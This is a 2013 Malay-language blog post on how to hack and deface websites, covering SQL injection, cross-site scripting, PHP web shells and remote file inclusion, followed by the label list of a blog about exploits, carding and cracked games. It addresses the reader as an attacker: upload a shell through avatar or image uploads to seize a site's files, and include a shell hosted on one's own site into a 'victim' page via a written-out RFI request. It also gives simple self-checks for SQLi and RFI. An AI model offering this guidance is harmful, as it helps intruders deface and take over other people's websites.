Wednesday, 24 April 2013

Cara Hack Laman Web (Deface)


Ini adalah beberapa cara untuk melumpuhkan laman web yang biasa digunakan oleh hacker.

1. SQL Injection - SQLi
2. XSS - Cross Site Scripting
3. Shells
4. RFI - Remote File Inclusion
5. Dan banyak lagi.

1. SQL Injection

Pada masa ini kebanyakkan laman web seperti forum dan laman web persendirian disambungkan kepada SQL Database. Ini membantu mereka untuk menyimpan ID dan PASSWORD [ENCRYPTED] apabila pelawat mendaftar di laman web mereka.

SQL Database akan berfungsi setiap kali pelawat LOG IN ke dalam laman web mereka.

Semasa proses LOG IN, maklumat ID dan PASSWORD pengguna akan dihantar ke SQL Datebase, sekiranya maklumat yang diberikan betul maka pengguna akan LOG IN ke dalam laman web tersebut, sekiranya maklumat yang diberikan salah maka pengguna akan mendapat ERROR yang menyatakan bahawa ID dan PASSWORD pengguna adalah salah.

Sebenarnya apa yang dilakukan oleh HACKER adalah cuba untuk mengeksplotasi dan memecah masuk ke dalam pangkalan data laman web tersebut untuk mencuri maklumat laman web tersebut.

HACKING jenis adalah paling rumit untuk dilakukan.

Jika anda ingin memeriksa laman web anda terdedah kepada SQLi ataupun tidak maka anda perlu membuat perkara seperti di bawah.

Contoh laman web anda :

lamanwebanda.com/index.php?id=545

Cuma perlu tambah ' pada hujung nombor tersebut.

lamanwebanda.com/index.php?id=545'

Jika ERROR keluar maka laman web anda terdedah kepada SQLi.

Contoh Error :

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"

....Dan banyak lagi

-------------------------------------------------------------------------------------------------

2. XSS - Cross Site Scripting

Biasanya kebanyakkan laman web / forum akan menyediakan kotak komen yang menyokong HTML. Ini akan memberi HACKER peluang untuk meletakkan skrip yang berniat jahat di dalam artikel tersebut. Jadi apabila pengguna lain mengklik link tersebut, secara automatik cookies / sejarah internet pengguna akan dihantar kepada HACKER yang meletakkan link tersebut. Jadi HACKER akan memanipulasi cookies tersebut untuk LOG IN ke dalam laman web dan meneruskan kerja untuk deface laman web tersebut.


-------------------------------------------------------------------------------------------------


3. Shells

Ini adalah script .php yang berbahaya. Apa yang anda perlu lakukan, cari laman web yang anda boleh upload apa sahaja file contohnya :- avatars, gambar atau lain-lain. Anda upload file shells anda keatas laman web tersebut dan jika anda berjaya maka apabila anda membuka laman web tersebut, anda akan nampak seluruh akaun "FTP - File Transfer Protocol" di dalam laman web tersebut. Anda boleh mengubah/mengedit/mengupload atau mendownload apa sahaja dari laman web tersebut termasuk laman index. Ini juga dinamakan sebagai DEFACE.


-------------------------------------------------------------------------------------------------


4. RFI - Remote File Inclusion

Ini adalah cara terbaik untuk membuat deface ke atas sesuatu laman web. Ia menggunakan shells. Anda harus mengupload shell anda di laman web anda sendiri.

KOD :

lamanwebanda.com/shells.txt

jika anda menemui laman web yang terdedah kepada RFI, anda harus melakukan seperti di bawah :

lamanwebmangsa.com/index.php?page=lamanwebanda.com/shells.txt

Ini akan memberi anda akses ke atas akaun FTP laman web mangsa. Jadi anda boleh melakukan apa sahaja termasuk mendeface laman web mangsa.

Jika anda ingin memeriksa laman web anda terdedah kepada ancaman RFI ataupun tidak maka anda harus melakukan seperti di bawah ini.

Contoh laman web anda :

lamanwebanda.com/index.php?id=545

buat seperti di bawah ini :

lamanwebanda.com/index.php?id=http;//www.google.com

Sekiranya laman web google dipamerkan dalam laman web anda maka laman web anda terdedah kepada ancaman RFI.

No comments:

Post a Comment

Updates Via E-Mail

Labels

007 Legends (1) 007 Legends repack (1) 007 Legends-Black Box (1) 007 Legends-Black Box repack (1) 2K Games (1) 2K Marin (1) Action (8) Action RPG (5) Activision Blizzard (3) Alan Wake American Nightmare (1) Alan Wake American Nightmare-Black Box (1) ANARCHY (5) Antara AES dan pemandu kereta perasan bijak (1) antivirus (6) ARTIKEL (90) Bethesda Softworks (2) Binary Domain (2) BioShock 2 (1) BioWare Corporation (1) bitComposer Games (1) Bugbear Entertainment (1) Call of Duty: Modern Warfare 3 (1) Call of Duty: Modern Warfare 3-Black Box (1) CARDING (3) CD Projekt Red Studio (1) CERITA (7) CRACKER (18) Crysis 2 (1) Crytek Studios (1) Dark Souls: Prepare to Die Edition (1) Dark Souls: Prepare to Die Edition-Black Box (1) Darksiders (1) Darksiders II (1) Deface (1) Devil's Details (2) Digital Extremes (1) Doom 3:BFG Edition (1) Doom 3:BFG Edition-Black Box (1) EA Sports (1) Electronic Arts Inc. (4) ENGLISH MOVIE (29) Eurocom Entertainment Software (1) event (1) Exploit (76) FABLE III (1) Facebook Game Hack (1) FIFA 13 (1) FIFA 13-Black Box (1) Flashing (1) Flying Wild Hog (1) From Dust (1) From Dust-Black Box (1) From Software (1) gba games (1) Global Ops: Commando Libya (1) Global Ops: Commando Libya-Black Box (1) GORE (1) Hard Reset (1) Hard Reset-Black Box (1) HIJACK (2) History (3) id Software (1) iklan. (4) Infinity Ward (1) INFO (35) iPhone Jailbreak (9) ISU SEMASA (33) JOB (1) JOOMLA (1) KILLUMINATI (7) Konami (1) Lain-Lain Trick (1) LionHead Studios (1) MAKE MONEY (1) MALAY MOVIE (15) Mass Effect 2 (1) Max Payne 3 (1) Max Payne 3-Black Box (1) Maxis (1) Microsoft Game Studios (1) misteri (4) MOBILE (1) MUJAHID (27) music album mp3 (20) n-gage (1) Namco Bandai Games (3) NDS (1) Notepad Trick (1) OS (5) OTHER MOVIE LANGUES (8) PC GAME (141) photo (5) political (2) Pro Evolution Soccer 2013 (1) Pro Evolution Soccer 2013-Black Box (1) Prototype 2 (1) Prototype 2-Black Box (1) PS VITA (4) PS3 GAME (32) PSN GAME (6) PSP (7) PSPGAMES (4) puisi (1) putlocker games (5) Racing (1) Radical Entertainment (1) religion (12) Remedy Entertainment (1) repack game (1) REVEAL (32) Ridge Racer Unbounded-Black Box (1) Rockstar Games (1) S60v2 (1) Samsung U1000 (1) SEGA (2) SEO (2) Shooter (2) Shooting (2) Soalan bocor SPM 2012 ada di sini (1) Soft Skills Guide (1) software (31) Spectral Games (1) Sport (2) Strategy (1) SYSTEME (3) The Darkness II (1) The Darkness II-Black Box (1) The Elder Scrolls V: Skyrim (1) The Elder Scrolls V: Skyrim-Black Box (1) The Sims 3 (1) The Sims 3 Complete (1) The Sims 3 Complete-Black Box (1) The Witcher 2: Assassins of Kings (1) THQ Inc (2) tips (1) TOKOH (1) tool (2) Tutorial (30) TWEAK (6) Ubisoft Studios (1) UNDERGROUND (4) video movie (1) video music (1) Vigil Games (2) Website Hack (1) wii (2) XBOX360 (7) xboxone (1)

Total Pageviews

Blog Archive

LIST